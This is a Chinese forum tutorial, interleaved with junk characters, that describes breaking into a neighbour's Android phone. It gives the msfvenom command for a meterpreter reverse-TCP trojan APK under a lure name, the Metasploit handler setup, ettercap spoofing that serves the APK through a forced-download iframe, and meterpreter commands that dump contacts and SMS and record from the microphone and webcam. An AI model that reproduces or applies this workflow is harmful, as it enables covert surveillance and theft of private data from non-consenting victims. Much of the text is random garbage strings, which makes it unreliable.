五、msf+ettercap入侵邻居安卓手机
首先启动msf $ r q: C; _, J$ M6 J# x4 }
4 X; `' w/ Z# }+ o0 I0 J; F0 |! w0 F' h' g+ b' B4 v 先用kali生成一个安卓木马,如下命令: 7 A+ ?. ?3 B) C) ~. @9 L, W
; P% D7 W7 x3 CMsfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.109 LPORT=44444 -o ~/Desktop/ribenav.apk
+ p: e# E' Q' N2 N, Z3 F+ i7 ~5 U- T& |. e为了能让对方下载以后安装我这里将马的名字命名为ribenav.apk,哈哈邻居可是个“大色鬼”,就不适用替换下载的方法了,据我所知,邻居频繁使用手机浏览器浏览新闻
0 C; T" `6 V+ w7 B然后进入msf
& y. X" S8 d! j use exploit/multi/handler 1 G) X, Y- C) h* B# M% l7 Q, P3 r
2 t4 Z* y7 X/ ^) ^, T' r1 | set payload android/meterpreter/reverse_tcp
( s( t2 Q& v/ T3 e D r5 ^ set LHOST 192.168.0.109 //ip为kaili的ip
0 C. v ^ |0 R, ^* o5 u/ V3 B$ Zset LPORT 44444 //端口一定要与前面生成的木马的端口一致
2 N3 A& U1 y" J- JExploit % \( c" U6 W K$ Z7 H# V
# _) W" M3 a" T7 O7 n' Z, n( [ g8 ]! t$ l 5 v& E0 Q$ l G: B
- u6 p2 e. P' y7 D- \5 n6 Q1 l( h/ E. p+ _ 下面我们开启ettercap -G
我物理IP为 3 N" d& J* k9 s' j! f
4 j( g& V2 A. w4 p, u% J! m: E) R f2 v6 {, M i% B $ g& M( Q% p2 [( Y0 C2 |. _
5 l- f3 z* z8 i/ B0 O) o 别到时候再把我物理机欺骗了,之前测试物理机只装腾讯管家是可以成功欺骗的,
下面我们来设置一下 : V# u e% j- P6 Y) a$ F! L
d0 l. } O5 b3 G) G+ i; M/ v4 \1 n. X) g8 u8 r
/ a3 e: G, A- A0 j7 z7 L9 ]2 t 在开启欺骗之前我们先把生成的apk马丢到kaili var/www/html下,并创建一个index.htm文件内容为:<iframe src=http://192.168.0.109/ribenav.apk></iframe>,因为apk文件嘛要想直接提示下载,用iframe语句就OK了,
6 P* N3 \0 Y6 h) _: @# q 0 s: i9 N* Y0 w% T0 J3 J$ `
8 R7 k" q! v/ a3 h4 M# G$ S. q6 A" U
/ ?+ p7 A) W: h9 C - J7 K" x' Q/ { C' u, n7 x
0 @: \. L: P9 F; X7 G7 ~! i. X
2 k6 [3 u$ s7 o8 w & O3 O( X9 C* s
# D' m: q- s' R: z5 {@4 R1 f8 _% v7 y: b$ }2 s
) W% O4 _5 T% {
* M# x; y7 {' ~4 w! E' M& c9 Z
- w0 D8 r4 J& f9 B0 L& B 5 e, J: n* o' z k% o8 G3 r
5 a C5 v; K* A0 ~# z6 V
! B0 j+ K1 V5 N
; z) I5 w2 x2 C
; y1 i7 `: P* d q+ y. F& m
- q! N( o) O i: Y) K 下面我们开始攻击
. N/ u7 F# T7 E3 j( o" i5 [: ^/ l' H: e1 }4 M I- C: D
/ p8 l% Q1 D- {0 ^# |3 X 1 u" L+ s7 f3 p% W% X0 {: f
; {% {5 ?9 j3 P ]
7 d/ p& f ^- X+ t" |2 h+ |+ N : Z8 F$ L! I6 e0 ^
& u: E+ s9 e7 J. |) z( F 大概过了5分钟多,发现反弹成功了
, J% N8 f! G) J( ^1 M! Q r2 B- {/ n$ x8 d
1 U0 i+ K, K( e5 R- n
: v% m8 J. k* K. m. g: h$ Z2 [9 A; L+ A! H. s4 b5 e 0 d1 Q/ ]/ H' h5 O# I, g6 P
: K* {7 u8 H8 o; J7 \. ]/ _1 L" G9 u: ^
5 u1 D0 G( w0 ?' k1 N# L9 R$ L9 Y9 ^ ; j! ^5 m8 _! P C z- @, r
4 x$ f% [8 Y, Z" c+ ]
$ t" \: Z) H( Y/ i8 h2 d0 } 执行命令
' K" _8 ~3 p) w; M( Z/ W" r' A/ q
dump_contacts --》这个是导出电话 8 G: U, _3 ?+ P. L2 m* T
% n* ~, q2 @) B! T. q0 W+ udump_sms --》这个是导出信息
. r$ N1 [# S! q% e) i$ O, g4 `: s7 A9 v4 v record_mic Record audio from the default microphone for X seconds
3 L5 ]1 s, t: J2 s$ \+ X9 n: C; t* u webcam_chat Start a video chat
# k/ R; Z# D* L1 w% ps! B* B6 K# ~% `- A webcam_list List webcams ; I0 H: b8 N- m9 a. `. n5 \9 }! p
! y c# K3 K* q+ g' r" Bwebcam_snap Take a snapshot from the specified webcam
3 \$ J+ M" u/ Q7 |3 @+ ?2 l/ a6 Q webcam_stream  lay a video stream from the specified webcam 2 U R- T0 j4 u! V- z
. N3 E" @1 W5 F4 ]% G' ~
3 z* q* p0 ?5 f: m! @% s$ z
. m0 }, a7 S: i) i1 J6 S- h 我们打开看一下电话薄,
( O& w( G2 \0 p* n) p( D! p( X$ g$ G7 h
& g& m9 |& l3 D7 Y# Q8 l
1 P) b% X% M, A6 p5 u: N
, \; y7 ^& @4 v . L* A4 ]( j6 t2 r3 G4 c5 L+ c$ f* K6 A' r
) T) s/ Z6 z9 P3 c
8 u2 D' o$ B4 i3 p2 e6 F: m
) u' Q$ s. G' T 我们同时欺骗成DroidJack木马,使用方法如图:
6 ~# }0 o1 y( c# Q- I/ |4 S: N5 u, [: p! z& {4 P
: }# G3 h. E3 [9 E& A4 E* J# E4 p' H8 `1 Q# n
$ l/ y% K& \9 U: x, a7 _% u8 t! B$ K, B' M
* @) v4 O7 P' e, H H3 D% c% T' [% ?; i- F i0 J, O2 S 切记在前面生成完马以后记得在这里选择开关为on,并且对应前面生成马的时候的端口
7 Q& ]) K* E4 q# V / h, I9 A% \4 k2 t& O! J/ `/ x5 s
2 z& H! b5 f" R, b( b6 U; `: I
2 ~2 |3 o5 ^7 Q7 u; }0 V1 R( [# n9 R3 w. H+ ]" g 1 \5 M" x7 ?/ z$ \3 ~4 k' Q" P
6 S' Y$ m# ?# K3 _( s! c& M' g
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) | Powered by Discuz! X3.2 |